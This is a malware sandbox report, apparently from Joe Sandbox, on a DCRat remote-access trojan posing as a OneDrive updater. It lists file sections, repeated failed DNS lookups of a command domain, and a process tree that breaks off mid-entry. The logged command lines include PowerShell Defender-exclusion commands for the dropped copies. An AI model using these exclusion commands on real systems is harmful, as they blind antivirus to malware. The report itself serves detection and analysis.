.text	0x2000	0xcea54	0xcec00	a5654686ee2116cd88ac0a10f7a75303	False	0.4223119142986699	data	5.464436382672015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd2000	0x320	0x400	0354c18886c42cbd493199d6867925b8	False	0.3525390625	data	2.6502033736331296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd4000	0xc	0x200	83d1c62f408c72eb5fab4265fe7807ed	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd2058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 12:44:20.361181974 CET	64480	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:44:20.926146030 CET	53	64480	1.1.1.1	192.168.2.7
Jan 13, 2025 12:44:44.971529961 CET	54279	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:44:45.002490997 CET	53	54279	1.1.1.1	192.168.2.7
Jan 13, 2025 12:44:53.427443981 CET	60969	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:44:53.845503092 CET	53	60969	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:02.433933020 CET	50807	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:03.461229086 CET	50807	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:03.474976063 CET	53	50807	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:03.475037098 CET	53	50807	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:08.475956917 CET	54266	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:08.629934072 CET	53	54266	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:14.685585022 CET	49395	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:14.717617035 CET	53	49395	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:21.644826889 CET	61485	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:22.159861088 CET	53	61485	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:45.065351009 CET	64223	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:45.217325926 CET	53	64223	1.1.1.1	192.168.2.7
Jan 13, 2025 12:45:53.460366011 CET	51345	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:45:53.492093086 CET	53	51345	1.1.1.1	192.168.2.7
Jan 13, 2025 12:46:10.375484943 CET	60375	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:46:10.590281963 CET	53	60375	1.1.1.1	192.168.2.7
Jan 13, 2025 12:46:19.024101973 CET	53477	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:46:19.417462111 CET	53	53477	1.1.1.1	192.168.2.7
Jan 13, 2025 12:46:27.170361996 CET	52056	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:46:27.374466896 CET	53	52056	1.1.1.1	192.168.2.7
Jan 13, 2025 12:46:35.967307091 CET	59445	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:46:36.468897104 CET	53	59445	1.1.1.1	192.168.2.7
Jan 13, 2025 12:46:45.146239996 CET	63321	53	192.168.2.7	1.1.1.1
Jan 13, 2025 12:46:45.177421093 CET	53	63321	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 12:44:20.361181974 CET	192.168.2.7	1.1.1.1	0xda9e	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:44:44.971529961 CET	192.168.2.7	1.1.1.1	0x657c	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:44:53.427443981 CET	192.168.2.7	1.1.1.1	0x79de	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:02.433933020 CET	192.168.2.7	1.1.1.1	0x36e3	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:03.461229086 CET	192.168.2.7	1.1.1.1	0x36e3	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:08.475956917 CET	192.168.2.7	1.1.1.1	0x50c7	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:14.685585022 CET	192.168.2.7	1.1.1.1	0x38db	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:21.644826889 CET	192.168.2.7	1.1.1.1	0x77a9	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:45.065351009 CET	192.168.2.7	1.1.1.1	0x9b92	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:53.460366011 CET	192.168.2.7	1.1.1.1	0x6b0c	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:10.375484943 CET	192.168.2.7	1.1.1.1	0xbce3	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:19.024101973 CET	192.168.2.7	1.1.1.1	0xc4bc	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:27.170361996 CET	192.168.2.7	1.1.1.1	0xfe5c	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:35.967307091 CET	192.168.2.7	1.1.1.1	0x20bb	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:45.146239996 CET	192.168.2.7	1.1.1.1	0xcd1	Standard query (0)	574565cm.renyash.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 12:44:20.926146030 CET	1.1.1.1	192.168.2.7	0xda9e	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:44:45.002490997 CET	1.1.1.1	192.168.2.7	0x657c	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:44:53.845503092 CET	1.1.1.1	192.168.2.7	0x79de	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:03.474976063 CET	1.1.1.1	192.168.2.7	0x36e3	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:03.475037098 CET	1.1.1.1	192.168.2.7	0x36e3	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:08.629934072 CET	1.1.1.1	192.168.2.7	0x50c7	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:14.717617035 CET	1.1.1.1	192.168.2.7	0x38db	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:22.159861088 CET	1.1.1.1	192.168.2.7	0x77a9	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:45.217325926 CET	1.1.1.1	192.168.2.7	0x9b92	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:45:53.492093086 CET	1.1.1.1	192.168.2.7	0x6b0c	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:10.590281963 CET	1.1.1.1	192.168.2.7	0xbce3	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:19.417462111 CET	1.1.1.1	192.168.2.7	0xc4bc	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:27.374466896 CET	1.1.1.1	192.168.2.7	0xfe5c	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:36.468897104 CET	1.1.1.1	192.168.2.7	0x20bb	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 12:46:45.177421093 CET	1.1.1.1	192.168.2.7	0xcd1	Server failure (2)	574565cm.renyash.top	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	06:43:59
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Imagebase:	0x200000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1247733245.0000000000202000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:44:02
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"
Imagebase:	0x7ff788270000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:44:02
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:44:03
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP"
Imagebase:	0x7ff7a02f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:44:03
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"
Imagebase:	0x7ff788270000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:44:03
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:44:03
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp" "c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP"
Imagebase:	0x7ff7a02f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:44:04
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	06:44:05
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:44:05
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	06:44:05
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:44:05
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	06:44:05
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	06:44:06
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat"
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	06:44:06
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:44:06
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:44:07
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:44:13
Start date:	13/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	06:44:17
Start date:	13/01/2025
Path:	C:\Users\Public\Documents\csrss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Documents\csrss.exe"
Imagebase:	0x90000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\Documents\csrss.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:44:18
Start date:	13/01/2025
Path:	C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"
Imagebase:	0x6b0000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:44:20
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:44:20
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:44:20
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:44:20
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:55:35
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Imagebase:	0x500000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:55:39
Start date:	13/01/2025
Path:	C:\Users\Public\Documents\csrss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Documents\csrss.exe"
Imagebase:	0x190000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:55:43
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Imagebase:	0x7f0000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:55:52
Start date:	13/01/2025
Path:	C:\Users\Public\Documents\csrss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Documents\csrss.exe"
Imagebase:	0xad0000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:55:54
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:55:54
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:55:54
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:55:54
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:56:00
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Imagebase:	0x1b0000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:56:03
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:56:03
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:56:03
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
